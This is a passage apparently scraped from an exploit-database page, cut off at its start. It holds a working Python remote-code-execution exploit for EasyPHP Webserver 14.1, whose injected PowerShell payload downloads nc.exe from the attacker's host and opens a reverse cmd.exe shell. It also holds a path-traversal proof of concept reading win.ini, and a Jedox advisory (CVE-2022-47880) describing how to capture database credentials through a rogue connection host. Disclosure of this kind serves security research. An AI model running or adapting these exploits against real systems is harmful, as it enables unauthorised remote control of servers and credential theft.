es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 28<br />Origin: http://127.0.0.1:10000<br />Connection: keep-alive<br />Referer: http://127.0.0.1:10000/index.php?zone=settings<br />Host: 127.0.0.1:10000<br /><br />app_service_control=calc.exe<br /><br />The calculator opens.<br /><br />Exploit:<br /><br /># !/usr/bin/python3<br />import requests<br />import sys<br /><br />if len(sys.argv) != 5:<br /> print("RCE: EasyPHP Webserver 14.1 and before - by Rafa")<br /> print("Usage: %s <TARGET> <TARGET_PORT> <LOCAL_IP> <LOCAL_PORT>" %<br />sys.argv[0])<br /> print("Example: %s 192.168.1.10 10000 192.168.1.11 9001" %<br />sys.argv[0])<br /> exit(1)<br /><br />else:<br /> target = sys.argv[1]<br /> targetport = sys.argv[2]<br /> localip = sys.argv[3]<br /> localport = sys.argv[4]<br /> # python3 -m http.server / python2 -m SimpleHTTPServer with nc.exe in<br />the directory<br /><br /> payload =<br />"powershell+-command+\"((new-object+System.Net.WebClient).DownloadFile('http://"<br />+ localip + ':8000' +<br />"/nc.exe','%TEMP%\\nc.exe'))\";\"c:\windows\\system32\\cmd.exe+/c+%TEMP%\\nc.exe+"<br />+ localip + "+" + localport + "+-e+cmd.exe\""<br /> print (payload)<br /> url = 'http://' + target + ':' + targetport + '/index.php?zone=settings'<br /> headers = {<br /> "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)<br />AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4433.0 Safari/537.36"<br /> }<br /> data = {'app_service_control':payload}<br /><br /> try:<br /> r = requests.post(url, headers=headers, data=data)<br /> except requests.exceptions.ReadTimeout:<br /> print("The payload has been sent. Check it!")<br /> pass<br /><br /><br /># Vulnerability Type: Path Traversal<br /><br />CVSS v3: 6.5<br />CVSS vector: 3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N<br />CWE: CWE-22<br /><br />Vulnerability description: An issue was discovered in EasyPHP Webserver<br />14.1. An Absolute Path Traversal vulnerability in / allows remote users to<br />bypass intended SecurityManager restrictions and download any file if you<br />have adequate permissions outside the documentroot configured on the server.<br /><br />Proof of concept:<br /><br />GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini<br />HTTP/1.1<br />Host: 192.168.X.X:10000<br />Connection: Keep-alive<br />Accept-Encoding: gzip,deflate<br />User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML,<br />like Gecko) Chrome/41.0.2228.0 Safari/537.21<br />Accept: */*<br /><br />HTTP/1.1 200 OK<br />Host: 192.168.X.X:10000<br />Connection: close<br />Content-Type: application/octet-stream<br />Content-Length: 499<br /><br />; for 16-bit app support [fonts] [extensions] [mci extensions] [files]<br />[Mail] MAPI=1 CMCDLLNAME32=mapi32.dll CMCDLLNAME=mapi.dll CMC=1 MAPIX=1<br />MAPIXVER=1.0.0.1 OLEMessaging=1 [MCI Extensions.BAK] 3g2=MPEGVideo<br />3gp=MPEGVideo 3gp2=MPEGVideo 3gpp=MPEGVideo aac=MPEGVideo adt=MPEGVideo<br />adts=MPEGVideo m2t=MPEGVideo m2ts=MPEGVideo m2v=MPEGVideo m4a=MPEGVideo<br />m4v=MPEGVideo mod=MPEGVideo mov=MPEGVideo mp4=MPEGVideo mp4v=MPEGVideo<br />mts=MPEGVideo ts=MPEGVideo tts=MPEGVideo<br /><br /></code></pre>
<pre><code># Exploit Title: Jedox 2022.4.2 - Disclosure of Database Credentials via Connection Checks<br /># Date: 28/04/2023<br /># Exploit Author: Team Syslifters / Christoph MAHRL, Aron MOLNAR, Patrick PIRKER and Michael WEDL<br /># Vendor Homepage: https://jedox.com<br /># Version: Jedox 2022.4 (22.4.2) and older<br /># CVE : CVE-2022-47880<br /><br /><br />Introduction<br />=================<br />An information disclosure vulnerability in `/be/rpc.php` allows remote authenticated users with the appropriate permissions to modify database connections to disclose the clear text credentials via the `test connection` function. To exploit the vulnerability, the attacker must set the host of the database connection to a server under his control.<br /><br /><br />Write-Up<br />=================<br />See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit vulnerability.<br /><br /><br />Proof of Concept<br />=================<br />1) The host part of a database connection can be changed in the connections details in the UI. Set the Host to a server that you control.<br /><br />2) Test the database connection.<br /><br />3) The webserver initiates a connection to the server that you control. Use wireshark to capture network traffic and to ultimately extract the database credentials.<br /><br /></code></pre>